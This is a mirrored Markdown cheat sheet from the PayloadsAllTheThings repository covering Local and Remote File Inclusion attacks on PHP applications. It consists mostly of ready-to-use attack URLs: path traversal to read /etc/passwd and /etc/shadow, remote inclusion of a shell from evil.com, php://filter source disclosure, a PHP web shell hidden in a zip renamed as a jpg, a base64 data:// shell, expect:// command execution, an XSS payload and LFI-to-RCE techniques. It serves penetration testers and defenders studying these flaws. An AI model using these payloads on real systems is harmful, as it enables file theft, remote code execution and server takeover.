mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 05:15:26 +00:00
100 lines
3.2 KiB
Markdown
100 lines
3.2 KiB
Markdown
# Local/Remote File Inclusion
|
|
The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application.
|
|
|
|
## Basic LFI (null byte, double encoding and other tricks)
|
|
```
|
|
http://example.com/index.php?page=etc/passwd
|
|
http://example.com/index.php?page=etc/passwd%00
|
|
http://example.com/index.php?page=../../etc/passwd
|
|
http://example.com/index.php?page=%252e%252e%252f
|
|
http://example.com/index.php?page=....//....//etc/passwd
|
|
```
|
|
|
|
Interesting files to check out :
|
|
```
|
|
/etc/issue
|
|
/etc/passwd
|
|
/etc/shadow
|
|
/etc/group
|
|
/etc/hosts
|
|
/etc/motd
|
|
/etc/mysql/my.cnf
|
|
/proc/[0-9]*/fd/[0-9]* (first number is the PID, second is the filedescriptor)
|
|
/proc/self/environ
|
|
/proc/version
|
|
/proc/cmdline
|
|
```
|
|
|
|
## Basic RFI (null byte, double encoding and other tricks)
|
|
```
|
|
http://example.com/index.php?page=http://evil.com/shell.txt
|
|
http://example.com/index.php?page=http://evil.com/shell.txt%00
|
|
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
|
|
```
|
|
|
|
|
|
|
|
## LFI / RFI Wrappers
|
|
|
|
LFI Wrapper rot13 and base64 - php://filter case insensitive
|
|
```
|
|
http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
|
|
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
|
|
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php
|
|
|
|
can be chained with a compression wrapper
|
|
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
|
|
```
|
|
|
|
|
|
LFI Wrapper ZIP
|
|
```python
|
|
echo "</pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
|
|
zip payload.zip payload.php;
|
|
mv payload.zip shell.jpg;
|
|
rm payload.php
|
|
|
|
http://example.com/index.php?page=zip://shell.jpg%23payload.php
|
|
```
|
|
|
|
|
|
RFI Wrapper DATA with "<?php system($_GET['cmd']);echo 'Shell done !'; ?>" payload
|
|
```
|
|
http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
|
|
```
|
|
|
|
RFI Wrapper EXPECT
|
|
```
|
|
http://example.com/index.php?page=php:expect://id
|
|
http://example.com/index.php?page=php:expect://ls
|
|
```
|
|
|
|
## Bonus XSS
|
|
XSS via RFI/LFI with "<svg onload=alert(1)>" payload
|
|
```
|
|
http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+
|
|
```
|
|
|
|
## LFI to RCE via /proc/*/fd
|
|
1. Upload a lot of shells (for example : 100)
|
|
2. Include http://example.com/index.php?page=/proc/$PID/fd/$FD
|
|
with $PID = PID of the process (can be bruteforced) and $FD the filedescriptor (can be bruteforced too)
|
|
|
|
|
|
## LFI to RCE via Upload
|
|
```
|
|
http://example.com/index.php?page=path/to/uploaded/file.png
|
|
```
|
|
You can injected the <?php system($_GET['c']); ?> into the metadata
|
|
|
|
## LFI to RCE via Phpinfo()
|
|
https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf
|
|
Use the script phpInfoLFI.py (also available at https://www.insomniasec.com/downloads/publications/phpinfolfi.py)
|
|
|
|
|
|
## Thanks to
|
|
* [OWASP LFI](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion)
|
|
* [HighOn.coffee LFI Cheat](https://highon.coffee/blog/lfi-cheat-sheet/)
|
|
* [Turning LFI to RFI ](https://l.avala.mp/?p=241)
|
|
* [Is PHP vulnerable and under what conditions?](http://0x191unauthorized.blogspot.fr/2015/04/is-php-vulnerable-and-under-what.html)
|